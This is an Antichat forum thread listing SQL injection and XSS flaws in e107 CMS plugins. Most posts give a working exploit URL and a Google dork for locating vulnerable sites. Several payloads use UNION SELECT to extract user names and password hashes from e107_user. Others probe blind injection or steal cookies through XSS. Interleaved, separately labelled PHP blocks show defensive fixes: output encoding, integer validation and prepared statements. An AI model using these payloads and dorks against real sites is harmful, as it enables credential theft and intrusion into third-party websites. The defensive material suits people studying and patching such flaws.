ANTICHAT: forum on information security, OSINT and technology
13.12.2010, 17:59
Guest
Election v0.5
SQL Injection:
/election.php (election_class.php)
PHP code:
...
$candidatelist = $dao->getCandidateList($election->getId());
...
if ($sql->db_Select("user", "user_id, user_name, user_login")) {
    while ($row = $sql->db_Fetch()) {
        $owners[] = array($row["user_id"], $row["user_name"] . " (" . $row["user_login"] . ")");
    }
}
...
Example:
Code:
http://e107/e107_plugins/election/election.php?1.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20e107_user--
Path:
http://e107/e107_plugins/election/admin_menu.php
http://e107/e107_plugins/election/e_comment.php
http://e107/e107_plugins/election/e_search.php
Dork: inurl:e107_plugins/election/

13.12.2010, 22:17
Guest
RSS Reader v1.10
Blind SQL Injection:
/include/getrss.php
PHP code:
...
$q = $_GET["q"];   // raw request value, no type check
...
$sql->DB_Select("rss_reader", "rss_feed_addr", "rss_feed_id=" . $q);   // concatenated straight into the WHERE clause
...
Example:
Code:
http://e107/e107_plugins/rss_reader/include/getrss.php?q=2%20and%20substring(version(),1,1)=5
Path:
http://e107/e107_plugins/rss_reader/admin_menu.php
Dork: inurl:e107_plugins/rss_reader/

14.12.2010, 11:27
Guest
Yellow Pages v2.0 b1
SQL Injection:
/yellowpages.php
Example:
Code:
http://e107/e107_plugins/yellowpages/yellowpages.php?1.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user--
Path:
http://e107/e107_plugins/yellowpages/admin_menu.php
http://e107/e107_plugins/yellowpages/admin_prefs_90.php
http://e107/e107_plugins/yellowpages/admin_update.php
http://e107/e107_plugins/yellowpages/e_list.php
http://e107/e107_plugins/yellowpages/e_search.php
etc.
Dork: inurl:e107_plugins/yellowpages/

14.12.2010, 12:16
Guest
Tutor Locator v1.1
XSS:
/tutor.php
PHP code:
{
    $pid = (isset($_POST['pid']) ? $_POST['pid'] : 0);
    $tmp = explode(".", e_QUERY);
    $tutor_from = intval($tmp[0]);
    $tutor_action = "item";
    $tutor_itemid = intval($tmp[4]);
    // author_name, comment and subject are stored exactly as posted
    $tutor_com->enter_comment($_POST['author_name'], $_POST['comment'], "tutor", $tutor_itemid, $pid, $_POST['subject']);
    // print $tutor_action.$tutor_itemid;
}
At the bottom there is a comment submission form: type in "alert('xss')" and... admire the result.
Path:
http://e107/e107_plugins/tutor/tutor_top_menu.php
Dork: inurl:e107_plugins/tutor/

14.12.2010, 14:52
Guest
roll_mini v1.2
XSS:
/roll.php
PHP code:
if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1";   // echoed back to the page unencoded
Example:
Code:
http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Administrator rights required, SQL injection:
/roll.php
PHP code:
if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1";
if ($_GET['add']) $add = $_GET['add'];
if ($_GET['edit']) $edit = $_GET['edit'];
if ($_GET['card_id']) $card_id = $_GET['card_id'];
if ($_GET['index_name']) $index_name = $_GET['index_name'];
if ($_GET['search']) $search = $_GET['search'];
if ($_GET['page']) { $page = $_GET['page']; } else { $page = 1; }
Further down, these variables go into database queries. Nothing is filtered.
Example:
Code:
http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E&card_id=-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4,5,6%20from%20e107_user&edit=1
Path:
http://e107/e107_plugins/roll_mini/search.php
Dork: inurl:e107_plugins/roll_mini/
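Output encoding for the two XSS cases above (the tutor.php comment fields and roll_mini's $_GET['cat']), as an added example that is not part of this thread or of either plugin. The helper names h(), renderComment() and categoryId(), and the stored-comment array, are assumptions; only the request values are modelled on the thread.

```php
<?php
// Added example (not the plugins' own code): encode user-supplied text at the
// moment it is written into HTML. tutor.php stores author_name, comment and
// subject as posted and roll_mini echoes $_GET['cat']; in both cases the value
// reaches the browser unencoded, which is the whole vulnerability.
declare(strict_types=1);

/** Encode a string for insertion into HTML text or a quoted attribute value. */
function h(string $s): string
{
    // ENT_QUOTES also converts the single quote, so the value is safe inside
    // single-quoted attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead
    // of returning an empty string and silently dropping the field.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Render one stored comment; every field is encoded at output time, not at input. */
function renderComment(array $c): string
{
    return '<div class="comment">'
         . '<b>' . h($c['author_name']) . '</b>: '
         . '<i>' . h($c['subject']) . '</i><br>'
         . nl2br(h($c['comment']))
         . '</div>';
}

/** roll_mini-style category id: validate it as an integer, never echo the raw value. */
function categoryId(array $get): int
{
    $id = filter_var($get['cat'] ?? '1', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? 1 : $id;   // same default the plugin uses
}

// Constructed input modelled on the payloads shown in the thread.
$stored = [
    'author_name' => 'guest',
    'subject'     => 'test',
    'comment'     => "<script>alert('xss')</script>",
];
echo renderComment($stored), "\n";

foreach (['7', '<script>alert(document.cookie)</script>', '0'] as $cat) {
    printf("cat=%-45s -> id_cat=%d\n", var_export($cat, true), categoryId(['cat' => $cat]));
}
```

The script tag in the comment is emitted as character entities and is shown as text by the browser, and a non-numeric or non-positive cat falls back to the plugin's default of 1. Encoding belongs at output because the same stored value may later be emitted into HTML, JavaScript or a mail; filtering on input would have to guess every context in advance.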

14.12.2010, 19:07
Guest
Locator v1.2
Administrator rights required, SQL injection:
/admin_countries.php
PHP code:
$sql->db_Select(DB_TABLE_LOCATOR_COUNTRY, "*", "locator_country_id=" . $_GET['locator_country_id']);   // GET value concatenated unchecked
Example:
Code:
http://e107/e107_plugins/locator/admin_countries.php?edit_country=1&locator_country_id=1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user--
Administrator rights required, SQL injection:
/admin_categories.php
PHP code:
$sql->db_Select(DB_TABLE_LOCATOR_TABLE, "*", "locator_cat_id=" . $_GET['locator_cat_id']);   // same pattern
Example:
Code:
http://e107/e107_plugins/locator/admin_categories.php?edit_category=1&locator_cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11--
There is plenty more that is buggy in the admin panel.
Dork: inurl:e107_plugins/locator/

05.01.2011, 23:12
Guest
League Version 1.04
SQL injection:
/lique.php
PHP code:
...
if ($_GET['Saison']) { $Saison = $_GET['Saison']; }   // raw request value
...
$query[0] = "lique_games";
$query[1] = "*";
$query[2] = "games_home_id=" . $pref['lique_my_team'] . " AND games_saison_id=" . $Saison
          . " AND games_date" . (time() - 604500) . " OR games_gast_id=" . $pref['lique_my_team']
          . " AND games_date" . (time() - 604500) . " ORDER BY games_date ";
...
Example:
Code:
http://e107/e107_plugins/lique/lique.php?Saison=-2%20union%20select%201,concat_ws%280x3a,user_name,user_password%29,3,4,5%20from%20e107_user--
Blind SQL injection:
/scorer.php
PHP code:
...
if ($_GET['Saison']) { $Saison = $_GET['Saison']; } else { $Saison = $pref['lique_my_saison']; }
if ($_GET['team']) { $team = $_GET['team']; } else { $team = $pref['lique_my_team']; }   // raw request value
$z['games'] = 0;
$sql->db_Select("lique_games", "*", "games_home_id=" . $team . " OR games_gast_id=" . $team . " ");
while ($row = $sql->db_Fetch()) {
    $z['games']++;
}
$qry1 = "
SELECT m.*, me.* FROM " . MPREFIX . "lique_liga AS m
LEFT JOIN " . MPREFIX . "lique_teams AS me ON me.team_id=m.liga_team_id
WHERE m.liga_id ='" . $team . "'
";
$sql->db_Select_gen($qry1);
$row = $sql->db_Fetch();
$team_ID = $row['team_id'];
$team_Name = $row['team_name'];
$team_admin = $row['team_admin_id'];
$team_url = $row['team_url'];
$team_icon = $row['team_icon'];
$team_description = $row['team_description'];
$z['players'] = 0;
$sql->db_Select("lique_roster", "*", "roster_team_id=" . $team . "");
while ($row = $sql->db_Fetch()) {
    $z['players']++;
}
...
Example:
Code:
http://e107/e107_plugins/lique/scorer.php?team=1%20and%20substring%28@@version,1,1%29=5
Blind SQL injection:
/strafen.php
PHP code:
...
if ($_GET['Saison']) { $Saison = $_GET['Saison']; } else { $Saison = $pref['lique_my_saison']; }
if ($_GET['team']) { $team = $_GET['team']; } else { $team = $pref['lique_my_team']; }   // raw request value
$z['games'] = 0;
$sql->db_Select("lique_games", "*", "games_home_id=" . $team . " OR games_gast_id=" . $team . " ");
while ($row = $sql->db_Fetch()) {
    $z['games']++;
}
$qry1 = "
SELECT m.*, me.* FROM " . MPREFIX . "lique_liga AS m
LEFT JOIN " . MPREFIX . "lique_teams AS me ON me.team_id=m.liga_team_id
WHERE m.liga_id ='" . $team . "'
";
$sql->db_Select_gen($qry1);
$row = $sql->db_Fetch();
$team_ID = $row['team_id'];
$team_Name = $row['team_name'];
$team_admin = $row['team_admin_id'];
$team_url = $row['team_url'];
$team_icon = $row['team_icon'];
$team_description = $row['team_description'];
$z['players'] = 0;
$sql->db_Select("lique_roster", "*", "roster_team_id=" . $team . "");
while ($row = $sql->db_Fetch()) {
    $z['players']++;
}
...
Example:
Code:
http://e107/e107_plugins/lique/strafen.php?team=1%20and%20substring%28@@version,1,1%29=5
And plenty more that is buggy...
Dork: inurl:e107_plugins/lique/
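The same defect runs through several posts in this thread: rss_reader's $_GET["q"], roll_mini's card_id, locator's locator_country_id and locator_cat_id, and lique's Saison and team are all concatenated into a db_Select() WHERE string as received. The block below is an added example, not e107's or any plugin's code, of validating such a value as an integer before it touches the query; positiveInt() and idWhere() are assumed names, and the trailing comment shows how getrss.php would use them.

```php
<?php
// Added example (not e107's or the plugins' own code): validate request values
// that are concatenated into a db_Select() WHERE string. An id column only
// ever needs a positive integer, so anything else is rejected outright.
declare(strict_types=1);

/**
 * Return the request value as a positive integer, or null for anything else.
 * Unlike intval(), this rejects "2 and 1=1" instead of truncating it to 2,
 * so a tampered request fails loudly rather than half-working.
 */
function positiveInt(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $v = filter_var(trim($raw), FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

/**
 * Build "<column>=<n>" for db_Select(), or null when the value is not a valid id.
 * The column name must come from code, never from the request; the regex
 * guards against a caller accidentally passing user data as the column.
 */
function idWhere(string $column, ?string $raw): ?string
{
    if (!preg_match('/\A[a-z_]+\z/', $column)) {
        throw new InvalidArgumentException("bad column name: $column");
    }
    $id = positiveInt($raw);
    return $id === null ? null : $column . '=' . $id;
}

// Constructed request values; the second and third have the shape seen in the thread.
$samples = ['2', '2 and substring(version(),1,1)=5', '-2 union select 1,2', '007', ''];
foreach ($samples as $q) {
    $where = idWhere('rss_feed_id', $q);
    printf("%-40s -> %s\n", var_export($q, true), $where ?? 'rejected (respond 400)');
}

// In getrss.php this replaces the raw concatenation:
//   $where = idWhere('rss_feed_id', $_GET['q'] ?? null);
//   if ($where === null) { header('HTTP/1.1 400 Bad Request'); exit; }
//   $sql->DB_Select("rss_reader", "rss_feed_addr", $where);
```

Only the plain "2" survives; FILTER_VALIDATE_INT also refuses leading zeros and empty strings, which is what you want for an id that is compared numerically. Rejecting with a 400 instead of falling back to a default also gives the access log a clear signal of tampered requests, which is how a defender would spot probing for the URLs listed in this thread.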

06.01.2011, 23:55
Guest
AACGC MOH Stats V1.0
SQL injection:
/Member_Details.php
PHP code:
...
if (e_QUERY) {
    $tmp = explode('.', e_QUERY);   // e_QUERY is the raw query string, split on "."
    $action = $tmp[0];
    $sub_action = $tmp[1];
    $id = $tmp[2];
    unset($tmp);
}
...
$sql->db_Select("user_extended", "*", "WHERE user_extended_id=$sub_action", "");   // second segment interpolated unchecked
$row = $sql->db_Fetch();
$sql2->db_Select("user", "*", "WHERE user_id='" . $row['user_extended_id'] . "'", "");
...
Example:
Code:
http://e107/e107_plugins/aacgc_mohstats/Member_Details.php?det.2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--
Dork: inurl:e107_plugins/aacgc_mohstats/
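Member_Details.php, like election.php and yellowpages.php earlier in the thread, takes its ids from e107's dot-separated e_QUERY string ("det.2", "1.-1") and uses the segments as-is. As an added example that is neither e107's nor the plugin's code, the parser below validates every segment against a fixed layout before any of it reaches a query. parseEQuery() is an assumed name; the ['action', 'id'] layout and the 'det' whitelist are assumptions taken from the example URL above.

```php
<?php
// Added example (not the plugin's own code): parse an e107 e_QUERY string into
// a whitelisted action and integer ids. Member_Details.php splits e_QUERY on
// "." and puts $tmp[1] straight into "WHERE user_extended_id=$sub_action".
declare(strict_types=1);

/**
 * Split $query on "." and check each segment against $spec, an ordered list of
 * 'action' (must appear in $actions) or 'id' (digits only, sane length).
 * Returns the typed segments, or null when the request does not fit the layout.
 */
function parseEQuery(string $query, array $spec, array $actions): ?array
{
    $parts = explode('.', $query);
    if (count($parts) !== count($spec)) {
        return null;                        // wrong number of segments
    }
    $out = [];
    foreach ($spec as $i => $kind) {
        $seg = $parts[$i];
        if ($kind === 'action') {
            if (!in_array($seg, $actions, true)) {
                return null;                // unknown action
            }
            $out[] = $seg;
        } else {                            // 'id'
            if (!ctype_digit($seg) || strlen($seg) > 10) {
                return null;                // not a plain number ("2 union ..." fails here)
            }
            $out[] = (int) $seg;
        }
    }
    return $out;
}

// Constructed inputs shaped like the requests in the thread.
$cases = [
    'det.2',                            // accepted
    'det.2 union select 1,2,3--',       // rejected: id segment is not digits
    'list.2',                           // rejected: action not whitelisted
    'det',                              // rejected: missing id
    'det.2.9',                          // rejected: extra segment
];
foreach ($cases as $q) {
    $r = parseEQuery($q, ['action', 'id'], ['det']);
    echo str_pad($q, 32), ' -> ', ($r === null ? 'reject' : json_encode($r)), "\n";
}

// Member_Details.php would then use the validated pieces only:
//   $r = parseEQuery(e_QUERY, ['action', 'id'], ['det']);
//   if ($r === null) { header('HTTP/1.1 400 Bad Request'); exit; }
//   [$action, $sub_action] = $r;
//   $sql->db_Select("user_extended", "*", "WHERE user_extended_id=$sub_action", "");
```

Note that tutor.php in this thread already wraps its segments in intval(); that stops injection but silently maps "2 union ..." to 2, whereas the digit check here rejects the request, which is the behaviour you want to see in the logs.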

07.01.2011, 20:48
Guest
Userclass Images v09 Beta
Administrator rights required, SQL injection:
/admin.php
PHP code:
...
$q = "SELECT * FROM " . MPREFIX . "userclass_images WHERE userclass_id='$_POST[uid]'";   // POST value interpolated into the query string
...

07.01.2011, 21:06
Guest
EveryPage v1.0
Administrator rights required, SQL injection:
/admin_config.php
PHP code:
...
$query = "ep_text='" . $_POST['code'] . "' WHERE ep_id='" . $_POST['id'] . "'";   // both POST values interpolated unescaped
...
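The last two posts (userclass_images/admin.php and everypage/admin_config.php) interpolate $_POST values that are genuinely free text into SQL, so integer validation does not apply; the fix is a parameterised statement. The block below is an added example, not the plugins' or e107's code: it rebuilds the EveryPage UPDATE both ways and runs them against an in-memory SQLite database through PDO so it works stand-alone. The plugins use e107's $sql object and MySQL, so the PDO driver, the table definition and the function names are assumptions; the SELECT in userclass_images is fixed the same way.

```php
<?php
// Added example (not the plugins' own code): the EveryPage UPDATE built by
// string interpolation next to the same statement as a prepared statement.
// PDO with an in-memory SQLite database is used only so the script runs
// offline; the plugin itself targets MySQL through e107's $sql object.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE everypage (ep_id INTEGER PRIMARY KEY, ep_text TEXT)');
$pdo->exec("INSERT INTO everypage VALUES (1, 'hello'), (2, 'world')");

/** How admin_config.php builds the statement: value and id spliced in as SQL text. */
function updateUnsafe(PDO $pdo, string $code, string $id): int
{
    $query = "ep_text='" . $code . "' WHERE ep_id='" . $id . "'";
    return $pdo->exec("UPDATE everypage SET " . $query);
}

/** Prepared statement: the values travel as parameters and are never parsed as SQL. */
function updateSafe(PDO $pdo, string $code, string $id): int
{
    $epId = filter_var($id, FILTER_VALIDATE_INT);
    if ($epId === false) {
        throw new InvalidArgumentException('ep_id must be an integer');
    }
    $st = $pdo->prepare('UPDATE everypage SET ep_text = :text WHERE ep_id = :id');
    $st->execute([':text' => $code, ':id' => $epId]);
    return $st->rowCount();
}

// Constructed form input containing an apostrophe, as any legitimate editor might type it.
$code = "Rock 'n' roll";

try {
    updateUnsafe($pdo, $code, '1');
} catch (PDOException $e) {
    // The apostrophe terminates the string literal early and the rest is parsed as SQL.
    echo "string-built statement failed: ", $e->getMessage(), "\n";
}

echo "rows updated by prepared statement: ", updateSafe($pdo, $code, '1'), "\n";
echo "stored text: ", $pdo->query('SELECT ep_text FROM everypage WHERE ep_id = 1')->fetchColumn(), "\n";
```

A benign apostrophe is enough to show the defect: the interpolated version throws a syntax error because the quote ends the literal, while the prepared version stores the text verbatim. The same property is what makes the prepared version immune to the injection described in the post, without any escaping logic of its own to get wrong.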